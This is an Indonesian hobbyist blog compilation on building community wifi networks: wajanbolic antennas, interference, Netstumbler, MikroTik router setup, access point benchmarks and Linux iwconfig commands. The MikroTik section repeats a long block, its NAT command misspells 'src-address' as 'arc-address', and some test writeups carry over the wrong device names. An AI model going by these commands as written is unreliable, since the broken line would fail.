Tutorial Lengkapnya versi PDF bisa di download
- Rakit dulu antena wajan yang telah siap di pakai, atau membeli antena bisa di beli disini : http://jaylangkung.com/?page_id=68
- Tersenyumlah sebelum memasang, hehehehe… yakinlah pasti bisa untuk di koneksikan ke ISP atau basecamp RTRW-Net terdeka.. teriakkan dengan keras “INI SANGAT MUDAH!!!” sebanyak 10 kali
- Lengkapilah lah peralatannya seperti :
- RJ45 secukupnya (lebih dari 2 jaga-jaga crimping ulang.. hehehe)
- Kabel UTP secukupnya sampe di atas tiang paling atas
- Kabel Listrik secukupnya plus colokannya
- Crimping tool
- Tester (kalo ada) memastikan kabel UTP yang telah di pasang RJ45 telah OK
- BOX buat naruh Radio (akses poin) di atas, bisa pake tupper ware (tempat kue yang gak ke pake)
- Solasi / lakban secukupnya
- Tiang yang agak tinggi secukupnya, untuk menaruh antena Wajan Bolic di atas atap (kalo tempat anda tinggi, cukup pipa paralon aja)
- Pastikan Kabel UTP ujung satu dan ujung lainnya telah terkonekkan semua.
- Pasangkan Pigtail ke Pipa yang telah terpasang N konektor (N Female), dan ujung lainnya ke Radio (akses poin).
- Pasangkan UTP yang telah di pasang RJ45, ujung satunya ke Radio (akses poin) yang telah di masukkan ke dalam tupper ware (tempat kue / box apa saja yang ada), dan ujung lainnya masuk ke lancard komputer
- Bawa keatas radio ama wajanBolic nya pasang di tiang untuk melakukan wardriving, pastikan dalam keadaan dan posisi yang LOS (Line Of Sight)
- Puter ke kanan dan kekiri untuk pointing ke signal yang terbaik yang ingin di tuju. setelah itu konekin dehh.
- lanjutkan dengan tutorial untuk mengkonekkan radio ke pemancar (misalkan ke RTRW-Net) artikel bisa di dapat kan disini : http://jaylangkung.com/?p=49
- Bercanda lagi dengan teman-teman se RT RW net.. hehehe.. ceting, browsing, dan lain-lain.
Sumber : http://jaylangkung.com/?p=59
Minggu, 25 Mei 2008
TIP MENGHIDARI INTERFERENSI
Tip wifi kali ini menyajikan, interferensi atau Noise yang merupakan pengganggu yang terberat dalam dunia wifi. Noise atau interferensi adalah sesama sinyal gelombang radio juga yang beroperasi pada frekuensi, interval dan area yang sama, akibatnya device client akan mengalami error saat menerjemahkan kode informasi yang sama, ibaratnya saat kita ngobrol dengan teman kita di tempat sepi dibandingkan ngobrol di warung kopi yang ramai gelak tawa.
Interferensi bisa menurunkan kinerja akses poin dalam memancarkan dan menerima sinyal, akses poin akan kehilangan gain, beberapa db bisa hilang, akibatnya terjadi error pada bit-bit informasi yang sedang dikirim, dan client penerima menemukan error tersebut sehingga menyebabkan delay atau penundaan pengiriman meski juga akan dikirim lagi data-data yang error, so karena itu mestinya kita harus melakukan penghematan gain yang kita miliki. Interferensi bisa juga berupa sinyal bluetooth, telepon tanpa kabel(Cordless), Microwave, bahkan perangkat motor elektrik pun menghasilkan noise, juga alam pun menghasilkan noise juga seperti hujan lebat, pepohonan, dan matahari(dalam skala yang kecil).
Jadi perhitungkan secara cermat jika anda melakukan instalasi wifi, baik indoor maupun outdoor, hindari atau kalau bisa hilangkan benda-benda yang menghasilkan interferensi besar, ingat kita harus melakukan penghematan gain yang kita punya, anda juga harus memperhitungkan channel yang akan dipakai sebaiknya pakai channel yang belum digunakan, tapi apabila channel sudah terpakai semua, anda bisa merubah polarisasi antena(mengubah kedudukan antena). Jika ternyata masalah interferensi tidak terelakkan lagi, maka sebaiknya anda mempertimbangkan menggunakan device wifi yang berbeda pita frekuensinya.
Mengenal Tool Netstumbler
Tip wifi kali ini mempersembahkan tool atau software freeware Netstumbler yang amat populer di kalangan aktivis wireless, tool ini berjalan di lingkungan Windows, dengan tool ini kita bisa mendeteksi sinyal jaringan wifi yang lagi aktif, dengan mengetahui sinyal-sinyal yang aktif saat ini, kita bisa memantau besarnya interferensi di lingkungan kita berada, Netstumbler ini juga bisa menangkap sinyal wifi yang lebih jauh dari yang bisa ditangkap oleh software monitoring bawaan device wifi standard.
Umumnya tool ini dipergunakan untuk keperluan hacking, pengujian konfigurasi jaringan, survey besarnya interferensi, menemukan tempat yang sepi dari jaringan wifi, dan memposisikan ketepatan arah antena(pointing).
Sayangnya netstumbler ini bisa disalah gunakan oleh orang untuk menemukan jaringan wifi yang rentan securitynya, lalu dia bisa menggunakan sedikit upaya untuk membobolnya, jadi bisa internetan gratis nih. Oleh karena itu pergunakan langkah security yang maksimal pada akses point anda, bila akses poin anda security WEP dan WPA nya aktif, maka Netstumbler akan memunculkan gambar gembok pada sinyal wifi yang WEP atau WPA nya aktif, so jangan coba-coba meremehkan perkara.
Disamping itu Netstumbler bisa melakukan monitoring channel-channel yang dipergunakan, kekuatan sinyal wifi, menampilkan SSID yang terdeteksi. Netstumbler juga bisa disandingkan dengan perangkat GPS, alhasil kita bisa memetakan jaringan wifi yang berada pada satu tempat, ini biasanya dilakukan sambil berjalan, juga melaporkan MAC Address akses poin plus frekuensi operasinya, mencatat level noise, serta perbandingannya dengan level kekuatan sinyal.
So tip wifi kali ini memberi saran kepada anda untuk men-disable broadcast SSID anda agar jaringan wifi anda tersembunyi, tidak bisa terdeteksi lagi oleh Netstumbler atau tool lainnya yang sejenis (meskipun demikian ada beberapa tool yang mampu memonitor SSID yang sudah ter-hidden/tersembunyi), tool buatan Marius Milner ini bisa didownload gratis di www.netstumbler.com.
Membuat Router Murah dan Mudah dengan Mikrotik
Dalam dunia wifi nama Mikrotik sangat tersohor baik sebagai Operating System (OS) router maupun penyedia peralatan wifi, meski untuk OS komplit yang mencakup Proxy, bandwidth management, firewall, hotspot, VPN dll kita harus mengeluarkan biaya untuk lisensinya, namun kalau kita gunakan hanya sebagai router saja, Sistem operasi dari Latvia ini bisa digunakan tanpa adanya batasan waktu, kita bisa mendownloadnya secara cuma-cuma di www.mikrotik.co.id, namun kalau semua fungsi diatas selain router kita hanya di diberi batasan satu hari saja untuk penggunaannya. Jadi dengan komputer yang cukup minim speknya misal Pentium I , hard disk 1-2 GB, memory 64 MB, tanpa mouse, keyboard ataupun monitor, kalau Mikrotik sudah jalan, kita hanya butuh mose, keyboard dan monitor sewaktu instalasi saja. jadi kita sudah bisa membuat router dengan dana minim, daripada kita membeli peralatan router yang bisa jutaan rupiah mahalnya. Mari kita mulai melakukan instalasi, sebelumnya kita sudah memiliki file imagenya Mikrotik yang didownload dari situsnya www.mikrotik.co.id, lalu kita burn ke cd blank.
INSTALASI
Sebelumnya pastikan komputer yang akan diinstall Mikrotik OS sudah ada 2 Lan Card, untuk spek hardware yang akan digunakan, anda bisa melihat rujukannya di http://mikrotik.com
– * booting dari CD ROM
Pilih paket-paket yang akan dipilih, untuk kebutuhan Router+Proxy+Bandwidth Management, sebaiknya anda pilih :
– System
– DHCP
– Advanced Tols
– Routing
– Routing Test
– Security
– Synchronous
– Web Proxy
– Web Proxy Test
Setelah memilih paket2 yang dibutuhkan tekan tombol “ i “ untuk mulai instalasi
Muncul tulisan “Do you want to keep...............” pilih n (no)
“Continue.....” , pilih y (yes)
Mulailah membuat partisi dan memformat hard disk, setelah instalasi paket2 yang tadi dipilih.
Setelah selesai, Mikrotik minta di reboot dengan menekan enter.
Setelah booting, muncul perintah untuk melakukan pengecekan hard disk, anda bisa pilih yes atau no, pilih no juga tidak mengapa jika anda yakin hard disk bebas dari bad sector.
Anda diminta untuk login, ketikkan admin pada : Mikrotik Login: admin
untuk mengisikan password tekan enter saja, karena password masih kosong pada instalasi baru,
– Dou you want to see...................., pilih no, untuk mempercepat proses
Muncul konsole Mikrotik, yaitu :
[admin@Mikrotik] >
Untuk merubah nama mesin Mikrotik ini, ketik :
[admin@Mikrotik] > system identity set name=mywifi
Lalu konsole berubah menjadi
[admin@mywifi] >
Merubah password mesin Mikrotik, ketikkan password =
[admin@mywifi] > password
old password (ketikkan kosong, jika sebelumnya anda belum mengeset password
new password : .........(ketikkan password yg baru?
retype new password :................ (masukkan sekali lagi passwordnya)
Untuk mematikan mematikan Mikrotik cukup kita ketikkan sbb
[admin@mywifi] > system shutdown
[admin@mywifi] > system reboot (untuk merestart nya)
[admin@mywifi] > system reset (untuk mereset konfigurasi yang sudah kita buat sebelumnya)
Perintah-perintah diatas harus dilakukan pada direktori admin.
Setelah itu anda perlu mengaktifkan kedua LAN Card yang terpasang, dengan contoh perintah di bawah ini :
[admin@mywifi] > interface ethernet enable ether1
[admin@mywifi] > interface ethernet enable ether2
Jika muncul tanda kesalahan, ada dua alasan:
pertama : Ada kemungkinan LAN Card yang terpasang, rusak
kedua : Driver dari LAN Card belum disupport oleh Mikrotik
Untuk Melihat kedua LAN Card yang terpasang(apakah sudah komplit dua), ketikkan .............
[admin@mywifi] > ip address
[admin@mywifi] ip address > interface print (atau perintah tersebut bisa disingkat menjadi" in pr " )
Lalu tampillah kedua LAN Card, perhatikan konsole diatas menandakan kita sudah berada pada direktori ip address
Berdasar tampilan monitor Mikrotik LAN Card pertama bernama "ether1" dimana ether1 ini nantinya terkoneksi ke IP Public/Internet sedang LAN Card kedua bernama "ether2" ini terkoneksi ke IP Local/LAN Lokal, kemudian kita memberi ip address pada masing-masing LAN Card, dengan perintah/command sebagai berikut :
[admin@mywifi] > ip address
[admin@mywifi] ip address > add interface=ether1 address=172.16.0.254/24
[admin@mywifi] ip address > add interface=ether2 address=192.168.1.254/24
Untuk mengetahui hasilnya ketikkan:
[admin@mywifi] ip address > print
Lihat hasilnya pada gambar diatas. untuk naik ke direktori yang lebih tinggi ketikkan titik dua " .. " , atau " / " ke direktori admin, yang merupakan direktori tertinggi.
Lalu kita mengisi ip address gateway dari LAN Card yang pertama, yakni dimana kita mendapat akses internet
[admin@mywifi] > ip route add gateway=192.168.1.1
Selanjutnya kita mengisi ip address DNS, isikan sesuai rekomendasi dari ISP anda,
[admin@mywifi] > ip dns set primary-dns=202.134.1.7
admin@mywifi] > ip dns set secondary-dns=202.134.0.155
Agar semua komputer client dalam LAN bisa lebih cepat browsing internet dengan cukup mengambil cache DNS pada router Mikrotik, jadi komputer client tidak berlu jauh-jauh meresolve DNS pada Server DNS ISP, maka Router Mikrotik perlu diset agar bisa melakukan penyimpanan cache DNS
[admin@mywifi] > ip dns set allow-remote-request=yes
Tapi semua komputer client, pada setting IP Address nya diisi kolom DNS primary, dengan IP Address nya Router Mikrotik, untuk secondary DNS nya biarkan saja kosong. Perhatikan pula gambar diatas apabila kita salah dalam mengetikkan perintah, maka akan muncul peringatan
"no such argument".
Selanjutnya kita mengeset agar mesin Mikrotik kita bisa menjadi router
[admin@mywifi] > ip firewall nat
[admin@mywifi] ip firewall nat> add chain=srcnat arc-address=192.168.1.0/24 out-interface=ether1 action=masquerade
Kita lihat hasilnya
[admin@mywifi] ip firewall nat> print
Lihat hasilnya pada monitor anda. untuk naik ke direktori yang lebih tinggi ketikkan titik dua " .. " , atau " / " ke direktori admin, yang merupakan direktori tertinggi.
Lalu kita mengisi ip address gateway dari LAN Card yang pertama, yakni dimana kita mendapat akses internet
[admin@mywifi] > ip route add gateway=192.168.1.1
Selanjutnya kita mengisi ip address DNS, isikan sesuai rekomendasi dari ISP anda,
[admin@mywifi] > ip dns set primary-dns=202.134.1.7
admin@mywifi] > ip dns set secondary-dns=202.134.0.155
Agar semua komputer client dalam LAN bisa lebih cepat browsing internet dengan cukup mengambil cache DNS pada router Mikrotik, jadi komputer client tidak berlu jauh-jauh meresolve DNS pada Server DNS ISP, maka Router Mikrotik perlu diset agar bisa melakukan penyimpanan cache DNS
[admin@mywifi] > ip dns set allow-remote-request=yes
Tapi semua komputer client, pada setting IP Address nya diisi kolom DNS primary, dengan IP Address nya Router Mikrotik, untuk secondary DNS nya biarkan saja kosong. Perhatikan pula gambar diatas apabila kita salah dalam mengetikkan perintah, maka akan muncul peringatan
"no such argument".
Selanjutnya kita mengeset agar mesin Mikrotik kita bisa menjadi router
[admin@mywifi] > ip firewall nat
[admin@mywifi] ip firewall nat> add chain=srcnat arc-address=192.168.1.0/24 out-interface=ether1 action=masquerade
Kita lihat hasilnya
[admin@mywifi] ip firewall nat> print
Nah pada tahap awal ini kita sudah bisa membuat Router Mikrotik, guna mengetahui hasilnya kita melakukan test ping( untuk perintah "ping" ini harus dilakukan pada direktori tertinggi yakni di direktori "admin") ke komputer client dari router Mikrotik kita, ketika muncul dalam proses ping tersebut ada kata-kata "ping time out" atau "host unreachable" maka kita tidak berhasil untuk koneksi, coba teliti kembali pada setting Mikrotik atau teliti pula konfigurasi ip address pada komputer client, kemudian coba pula ping ke alamat internet dari komputer client atau browsing dari komputer client, jika berhasil maka berhasil pula tugas kita membuat Router Mikrotik.
Apakah Hotspot Wifi Gratis Bisa Ditembak dari Rumah kita?
Apakah Hotspot Gratis Bisa Ditembak dari Rumah kita?
Pertanyaan ini seringkali dilontarkan ke penulis, semenjak frekuensi 2.4Ghz dibebaskan penggunaannya oleh pemerintah, pertumbuhan jaringan wifi dan hotspot meningkat drastis, taman-taman hiburan, restoran, cafe, dan kantor tak luput memeriahkan suasana ber-hotspot ria. Kita bisa mengakses internet gratis dari tempat-tempat yang ada hotspotnya. Fenomena ini membuat ngiler sebagian masyarakat untuk mendapatkan kesempatan berinternet ria, bahkan merekapun ingin menikmati internet gratis dari rumah dengan dengan menembak sinyal wifi hotspot tersebut dari kediaman mereka, he he he bisa nggak ya............
Pada umumnya pembuatan hotspot cukup dengan menggunakan alat yang disebut akses poin, dimana pada akses poin tersebut sudah dilengkapi dengan antena internal yang berkekuatan sekitar 3-5db,(contoh akses poin ada pada gambar disamping) pemasangan akses poin dengan antena internal tersebut jangkauannya amat terbatas, sekitar puluhan atau bahkan ratusan meter persegi, diatas itu, sinyalnya sulit ditangkap, apalagi kalau diatas jarak 500 meter atau lebih dari tempat akses poin tersebut berada, konsepnya seperti kalau anda penggemar salah satu radio FM favorit anda di Surabaya, kemudian ketika anda bepergian ke Semarang, apakah anda bisa mendengar siaran radio kesayangan anda tersebut, meski dengan radio yang paling mahal di Semarang?? Konsep hotspot di tempat-tempat publik seperti itu memang didesain untuk kalangan pengguna lokal bukan untuk kalangan di luar tempat hotspot itu berada. Tapi kalau akses poin di tempat hotspot itu menggunakan antena luar/outdoor yang berkekuatan diatas 10 db atau lebih, maka ada kemungkinan dia bisa diakses dari jarak yang jauh, meski di luar tempat hotspot itu berada. Sebaiknya anda melakukan survey terlebih dahulu ke tempat hotspot itu untuk mengetahui type atau merk akses poin yang digunakan dan type antena yang menempel di akses poin tersebut, juga anda sebaiknya punya pengetahuan yang cukup tentang wifi beserta spesifikasi peralatan wifi, tanpa adanya pengetahuan itu sulit bagi anda untuk "menembaknya", meski memang sebagian hotspot sengaja dibuat untuk "terbuka", tidak ada pengamannya, jadi anda bisa untuk mengaksesnya, "JIKA" anda memang berada pada jangkauan sinyal wifi-nya
Test USB Wireless Edimax EW7318UG
Kami melakukan pengujian menggunakan USB Wireless Edimax EW7318UG berchipsetkan Ralink yang diset sebagai Akses Poin(AP) dalam jaringan Ad Hoc, serta sebagai client penerima adalah PCMCIA WLAN AR5001X milik penulis yang berchipsetkan Atheros, dan alat test tool Netstumbler versi 0.4.0, kekuatan signal mencapai maksimum hingga 44 dan SNR 38 pada jarak 5 meter yang terhalang dinding tembok. Penulis juga melakukan ping dari komputer Windows XP ke USB Wifi Edimax dengan menggunakan perintah :
ping 192.168.1.50 -n 100 -l 65500
dimana perintah tersebut melakukan ping dengan kekuatan beban sebesar 65.500 bytes ke USB Wifi Edimax selama 100 kali, hasilnya adalah paket yang terkirim sebanyak 97 dan 7 paket hilang (7%loss), waktu tempuh minimum 126ms, maksimum 306ms, rata-rata 173ms. Penulis juga melakukan transfer file video sebesar 547.906KB, hasilnya terkirim dengan mulus, tanpa terputus-putus, kesimpulanya adalah anda layak untuk membelinya, cocok banget buat berhotspot ria.
Spesifiaksi Produk :
Standards IEEE 802.11b/gUSB Port USB 2.0 Type A
Frequency Band 2.4000~2.4835GHz
(Industrial Scientific Medical Band)
Modulation OFDM with BPSK, QPSK, 16QAM, 64QAM (11g)
BPSK, QPSK, CCK (11b)
Data Rate 54/48/36/24/18/12/11/9/6/5.5/2/1Mbps auto fallback
Security 64/128/256-bit WEP Data Encryption,
WPA/WPA2 (TKIP with IEEE 802.1x) and AES
Antenna Internal Antenna
Dimension 14(H) x 28.5(W) x 91(D) mm
Transmit Power 16 dBm (Typical)
Temperature 0~60oC
Humidity 10~85% (Non-Condensing)
Certification FCC, CE
TEST BERBAGAI AKSES POIN
Pada kesempatan kali ini kami menguraikan test/uji berbagai merk access point yang beredar di pasaran saat ini, sengaja dalam pengujian ini kami membiarkan setting akses poin dalam kondisi defaultnya, kalaupun ada itu hanya sekedar mengganti setiing ip address saja, demikian selamat menikmati
Pengujian menggunakan USB Wireless Edimax EW7318UG berchipsetkan Ralink yang diset sebagai Akses Poin(AP) dalam jaringan Ad Hoc, serta sebagai client penerima adalah PCMCIA WLAN AR5001X milik penulis yang berchipsetkan Atheros, dan alat test tool Netstumbler versi 0.4.0, kekuatan signal mencapai maksimum hingga 44 dan SNR 38 pada jarak 5 meter yang terhalang dinding tembok. Penulis juga melakukan ping dari komputer Windows XP ke USB Wifi Edimax dengan menggunakan perintah :
ping 192.168.1.50 -n 100 -l 65500
dimana perintah tersebut melakukan ping dengan kekuatan beban sebesar 65.500 bytes ke USB Wifi Edimax selama 100 kali, hasilnya adalah paket yang terkirim sebanyak 97 dan 7 paket hilang (7%loss), waktu tempuh minimum 126ms, maksimum 306ms, rata-rata 173ms. Penulis juga melakukan transfer file video sebesar 547.906KB, hasilnya terkirim dengan mulus, tanpa terputus-putus, kesimpulanya adalah anda layak untuk membelinya, cocok banget buat berhotspot ria.
Test AP TP-LINK TP-link eXtended Range 54M Wireless Access Point
Pada kesempatan yng sama penulis melakukan test pada Akses Poin merk TP-Link TL-i, akses poin yang lagi naik daun ini berchipsetkan Atheros, sebagai client, tetap kami gunakan PCMCIA WLAN AR5001X , pada jarak 5 meter yang terhalang tembok tebal, kami berhasil melakukan transfer data berupa sebuah file sebesar 56,1MB tanpa terputus-putus, selama 2 menit 36,5 detik. Kemudian tetap pada jarak 5 meter yang terhalang tembok rapat, penulis melakukan test dengan Nestumbler, didapat kekuatan signal maksimal sebesar 37 dan SNR juga 32, lalu penulis juga melakukan ping dari notebook yang berbasiskan Windows XP ke AP TP-Link dengan menggunakan perintah
ping 192.168.1.1 -n 100 -l 65500
dimana perintah tersebut melakukan ping dengan kekuatan beban sebesar 65.500 bytes ke AP TP-Link selama 100 kali, hasilnya adalah paket yang terkirim 0, tidak ada satupun yang berhasil terkirim, semuanya RTO (Request Time Out), begitu pula ketika diberi beban 1500 byte, hasilnya tetap RTO semua, baru ketika diberi beban 1470byte, 100% paket terkirim semua. Kesimpulannya meski mengusung chipset bagus, tapi kinerja TP-Link masih kurang memuaskan.
Tes AP Edimax 7206Apg
Kali ini penulis melkukan test pada Akses Poin merk Edimax 7206Apg, akses poin yang kawakan di kalangan praktisi wifi ini berchipsetkan Realtek, sebagai client, tetap kami gunakan PCMCIA WLAN AR5001X , pada jarak 5 meter yang terhalang tembok tebal, kami berhasil melakukan transfer data berupa sebuah file sebesar 56,1MB tanpa terputus-putus dalam waktu 41,9 detik. Kemudian tetap pada jarak 5 meter yang terhalang tembok rapat, penulis melakukan test dengan Nestumbler, didapat kekuatan signal maksimal sebesar 33 dan SNR sebesar 30, lalu penulis juga melakukan ping dari notebook yang berbasiskan Windows XP ke AP Edimax dengan menggunakan perintah
ping 192.168.2.1 -n 100 -l 65500
dimana perintah tersebut melakukan ping dengan kekuatan beban sebesar 65.500 bytes ke AP TP-Link selama 100 kali, hasilnya adalah paket yang berhasil terkirim sebanyak 95 dan 5 paket hilang (5%loss), waktu tempuh minimum 125ms, maksimum 516ms, rata-rata 176ms.
Kesimpulannya nama tersohor Edimax, memang bukan bualan atau promosi belaka, meski tingkat signal di bawah AP TP-Link tapi performanya jauh diatas TP-Link.
Tes AP MINITAR Broadband Router
Kami juga melakukan test pada Akses Poin + Router merk Minitar, akses poin yang kawakan di kalangan praktisi wifi ini berchipsetkan Realtek, sebagai client, tetap kami gunakan PCMCIA WLAN AR5001X , pada jarak 5 meter yang terhalang tembok tebal, kami berhasil melakukan transfer data berupa sebuah file sebesar 56,1MB tanpa terputus-putus dalam waktu 51,3 detik. Kemudian tetap pada jarak 5 meter yang terhalang tembok rapat, penulis melakukan test dengan Nestumbler, didapat kekuatan signal maksimal sebesar 36 dan SNR sebesar 29, lalu penulis juga melakukan ping dari notebook yang berbasiskan Windows XP ke AP Edimax dengan menggunakan perintah
ping 192.168.1.254 -n 100 -l 65500
dimana perintah tersebut melakukan ping dengan kekuatan beban sebesar 65.500 bytes ke AP Minitar selama 100 kali, hasilnya adalah paket yang berhasil terkirim sebanyak 98 dan 2 paket hilang (2%loss), waktu tempuh minimum 136ms, maksimum 259ms, rata-rata 165ms.
Kesimpulannya AP plus Router ini layak dijadikan sebagai gawang internet anda, kemampuan memorynya yang cukup besar yakni 256MB, mampu memberikan pelayanan yang cukup baik bagi para clientnya.
Tes AP Linksys WAP54G
Test juga dilakukan pada Akses Poin merk Linksys WAP 54G, akses poin yang kawakan di kalangan praktisi wifi ini berchipsetkan Realtek, sebagai client, tetap kami gunakan PCMCIA WLAN AR5001X , pada jarak 5 meter yang terhalang tembok tebal, kami berhasil melakukan transfer data berupa sebuah file sebesar 56,1MB tanpa terputus-putus dalam waktu 44,3 detik. Kemudian tetap pada jarak 5 meter yang terhalang tembok rapat, penulis melakukan test dengan Nestumbler, didapat kekuatan signal maksimal sebesar 25 dan SNR sebesar 31, lalu penulis juga melakukan ping dari notebook yang berbasiskan Windows XP ke AP Edimax dengan menggunakan perintah
ping 192.168.1.254 -n 100 -l 65500
dimana perintah tersebut melakukan ping dengan kekuatan beban sebesar 65.500 bytes ke AP Minitar selama 100 kali, hasilnya adalah paket yang berhasil terkirim sebanyak 100 dan 0 paket hilang (0%loss), waktu tempuh minimum 126ms, maksimum 237ms, rata-rata 146ms.
Kesimpulannya AP besutan Cisco ini layak dijadikan sebagai andalan hotspot anda, kecepatan dan kestabilannya memang cukup mengagumkan, layak dengan design bodynya yang kokoh namun menawan.
Tes AP Edimax BR-6204Wg Wireless 802.11b/g Broadband Router with 4 Ports Switch
Test pada Akses Poin merk Edimax Router, akses poin yang kawakan di kalangan praktisi wifi ini berchipsetkan Realtek, sebagai client, tetap kami gunakan PCMCIA WLAN AR5001X , pada jarak 5 meter yang terhalang tembok tebal, kami berhasil melakukan transfer data berupa sebuah file sebesar 56,1MB tanpa terputus-putus dalam waktu 1 menit 5,7 detik. Kemudian tetap pada jarak 5 meter yang terhalang tembok rapat, penulis melakukan test dengan Nestumbler, didapat kekuatan signal maksimal sebesar 27 dan SNR sebesar 23, lalu penulis juga melakukan ping dari notebook yang berbasiskan Windows XP ke AP Edimax dengan menggunakan perintah
ping 192.168.2.1 -n 100 -l 65500
dimana perintah tersebut melakukan ping dengan kekuatan beban sebesar 65.500 bytes ke AP TP-Link selama 100 kali, hasilnya adalah paket yang berhasil terkirim sebanyak 94 dan 6 paket hilang (6%loss), waktu tempuh minimum 144ms, maksimum 716ms, rata-rata 184ms.
Kesimpulannya meski tidak terlalu mengecewakan, namun hasil test kali ini lebih baik dari adiknya yakni Edimax 7206Apg.
Mengenal Perangkat Wireless RT-RW Net
Banyaknya pertanyaan yang diajukan ke penulis mengenai panduan peralatan yang dibutuhkan membuat RT RW Net, mendorong kami menuliskannya dalam blog ini,
pertama yang anda siapkan, adalah bahwa anda sudah memiliki koneksi internet Unlimited di tempat atau rumah yang akan dijadikan sebagai pemancar Wireless LAN(WLAN) anda.
Peralatan yang dibutuhkan antara lain :
1. Access Point
Fungsi Access Point ibaratnya sebagai Hub/Switch di jaringan lokal, yang bertindak untuk menghubungkan jaringan lokal dengan jaringan wireless/nirkabel para client/tetangga anda, di access point inilah koneksi internet dari tempat anda dipancarkan atau dikirim melalui gelombang radio, ukuran kekuatan sinyal juga mempengaruhi area coverage yang akan dijangkau, semakin tinggi kekuatan sinyal(ukurannya dalam satuan dBm atau mW) semakin luas jangkauannya.
2. Antena Omni
Untuk memperluas coverage area hingga beberapa Kilometer, anda memerlukan antena omni eksternal, meski ketika anda membeli access point sudah dilengkapi antena omni, namun belumlah cukup karena hanya berkekuatan sekitar 3-5dB, untuk memperluas area jangkauannya, anda memerlukan antena Omni eksternal, yang rata-rata berkekuatan 15dB.
Antena Omni ini memiliki pancaran atau radiasi 360 derajat, jadi cocok bisa menjangkau client dari arah mana saja.
3. Box Access Point
Untuk melindungi access point anda, maka diperlukan pelindung berbentuk kotak, bisa terbuat dari plastik atau plat besi, rata-rata kotak ini sudah dilengkapi dengan kunci pengaman, dan box ini memang harus diletakkan persis di bawah antena.
4. Kabel Pigtail/Kabel Jumper
Kabel Pigtail atau kabel jumperl diperlukan untuk menghubungkan antara antena omni dengan dengan access point, perhatikan panjang maksimal yang diperlukan hanya 1 meter, selebih dari itu anda akan mengalami degradasi sinyal(loss dB) Pada kedua ujung kabel terdapat konektor dimana type konektor disesuaikan dengan konektor yang melekat pada access point anda.
5. POE (Power Over Ethernet)
Agar kabel listrik tidak dinaikkan ke atas untuk "menghidupkan" access point maka anda memerlukan alat "POE" ini yang fungsinya mengalirkan listrik melalui kabel ethernet atau kabel UTP/STP, dengan alat ini maka anda tidak perlu repot-repot lagi mengulur kabel listrik ke atas tower, lebih praktis dan hemat.
6. Kabel UTP/STP
Meski namanya perangkat wireless, namun peranan kabel juga diperlukan, kabel UTP/STP ini diperlukan untuk menghubungkan antara access point dengan jaringan kabel pada LAN lokal anda, jadi di bawah dia bisa ditancapkan ke komputer Gateway/Router atau ke Hub/Switch, pilihlah kabel UTP/STP yang berkualitas baik guna meningkatkan kualitas arus listrik yang dilewatkan melalui POE.
7. Penangkal Petir (Lightning Arrester)
Sebagai pengaman dari petir maka anda memerlukan alat ini yang berfungsi menyalurkan kelebihan beban listrik saat petir menyambar ke kabel pembumian(grounding), komponen ini dipasang pada kabel jumper antara perangkat access point dengan antena eksternal. Grounding untuk penangkal petir umumnya ditanam dengan batang tembaga hingga kedalaman beberapa meter sampai mencapai sumber air. Ingat grounding yang kurang baik akan menyebabkan perangkat wireless tetap rentan terhadap serangan petir.
8. Tower
Guna mendapatkan jangkauan area coverage yang maksimal, anda perlu menaikkan antena omni eksternal ke tempat yang tinggi agar client WLAN anda bisa menangkap sinyal radio anda dengan baik.
Pada sisi client, untuk menangkap sinyal dari "antena omni" anda maka perangkat client sbb :
1. Untuk Client yang jaraknya dari tempat pemancar kurang dari 1 KM, lebih ekonomis jika menggunakan wajan bolic, dimana pada perangkat tersebut biasanya sudah dilengkapi dengan USB Wifi, yang disambungkan dengan kabel UTP plus kabel extended USB, jadi langsung anda bisa menancapkannya ke komputer.
2. Apabila jarak client lebih dari 1 KM, anda membutuhkan 2 perangkat, pertama, access point dan kedua antena eksternal pengarah atau type grid untuk menangkap sinyal dari pemancar anda. Berikut rekomendasinya :
- Jarak 0-1 KM, pakailah wajan bolic lebih ekonomis
- Jarak 1-2 KM, Akses poin merk Edimax/Minitar/Linksys, antenanya anda bisa
pakai Yagi atau Backfire
- Jarak 2-3 KM, Akses poin merk Edimax/Minitar/Linksys, antena Grid 24db
- Jarak 3-10 KM. Akses poin merk Senao SL2611/Mikrotik, antena Grid 24db
- Jarak 10 KM lebih, Akses poin merk Senao ECCB3220/Mikrotik, antena Grid
24db.
Wireless Command Lines in Linux
Pada kesempatan kali ini kami membahas berbagai perintah setting wireless di Linux, namun tidak semua card atau PCMCIA support dengan perintah-perintah di bawah ini :
*Untuk menghubungkan ke wireless LAN yang Open atau Secured by WEP (DHCP)
#iwconfig [interface] mode managed key [WEP key]
->Gantilah kata "interface" dengan nama interface anda yang lagi aktif saat ini, misal ath0, wlan0 atau eth1.
->WEP key, masukkanlah kata kuci WEP, 10 carakter hexadecimal untuk 64 bit dan 26 carakter untuk 128 bit.
#iwconfig essid "[ESSID]" ->Spesifikasi SSID dari suatu WLAN
#dhclient [interface] -> untuk mendapatkan IP address, netmask, DNS server and default gateway dari akses poin
*Untuk menghubungkan ke wireless LAN yang Open atau Secured by WEP (IP Manual/Statis)
#iwconfig [interface] mode managed key [WEP key]
#iwconfig essid "[ESSID]"
#route add default gw [IP of default gateway] ->Masukkan Ip Address gatewaynya
#echo nameserver [IP address of DNS server] >> /etc/resolve.conf, konfigurasikan AP ->Konfigurasikan DNS server anda
#ping www.detik.com ->ping ke internet untuk uji koneksi
* Kumpulan perintah iwconfig
iwconfig [interface] mode master ->Menjadikan kartu PCMCIA dalam mode akses poin
# iwconfig [interface] mode managed -> Menjadikan kartu PCMCIA anda dalam mode client pada jaringan wifi infrastruktur
# iwconfig [interface] mode ad-hoc ->Mengeset kartu anda sebagai anggota di jaringan wifi ad hoc tanpa akses poin
#iwconfig [interface] mode monitor ->Mengeset kartu anda dalam mode monitor
# iwconfig [interface] essid “your ssid_here” ->konfigurasikan ssid jaringan anda.
# iwconfig [interface] key 1111-1111-1111-1111 (mengeset kunci WEP 128bit)
# iwconfig [interface] key 11111111 (mengeset kunci WEP 65 bit)
# iwconfig [interface] key off (menonaktifkan kunci WEP)
#iwconfig [interface] key open (menset sebagai open mode,tidak diperlukan autentikasi)
# iwconfig [interface] channel [channel no.] (menset sebuah channel 1-14)
#iwconfig [interface] channel auto (memilih channel otomatis)
#iwconfig [interface] freq 2.422G (menset channel dalam Ghz)
#
#iwconfig [interface] ap 11:11:11:11:11:11 (memaksa kartu untuk mendaftar ke alamat AP)
# iwconfig [interface] rate 11M (kartu akan menggunakan kecepatan tertentu)
# iwconfig [interface] rate auto (memilih kecepatan otomatis)
# iwconfig [interface] rate auto 5.5M (kartu akan menggunakan kecepatan tertentu dan kecepatan di bawahnya jika memang diperlukan)
